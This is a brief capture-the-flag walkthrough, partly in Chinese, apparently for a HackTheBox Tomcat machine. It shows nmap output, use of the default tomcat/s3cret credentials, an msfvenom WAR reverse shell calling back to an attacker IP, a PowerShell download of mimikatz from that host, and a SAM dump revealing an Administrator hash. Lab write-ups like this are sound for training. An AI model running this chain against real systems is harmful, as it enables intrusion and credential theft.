Recon
export IP=10.10.10.95
nmap -sC -A -p- --min-rate 1000 -T4 $IP
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone
Running (JUST GUESSING): Microsoft Windows 2012|Phone|8 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2012 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_8
Aggressive OS guesses: Microsoft Windows Server 2012 (89%), Microsoft Windows Server 2012 or Windows Server 2012 R2 (89%), Microsoft Windows Server 2012 R2 (89%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows 8.1 Update 1 (85%)
Shell as Root
- 查看 8080 端口,发现 tomcat 服务

- 枚举弱密码 - tomcat/s3cret

- 生成 war 后门并上传
msfvenom -p java/jsp_shell_reverse_tcp -a x64 LHOST=10.10.16.6 LPORT=2233 -f war -o reverse.war

curl http://tomcat:[email protected]:8080/reverse/

Dump Hash
powershell (new-object System.Net.WebClient).DownloadFile('http://10.10.16.6/mimikatz.exe','C:\Windows\Temp\mimikatz.exe')
C:\Windows\Temp\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" exit
---
Administrator:fe34b627386c89a49eb254f6a267e4d9
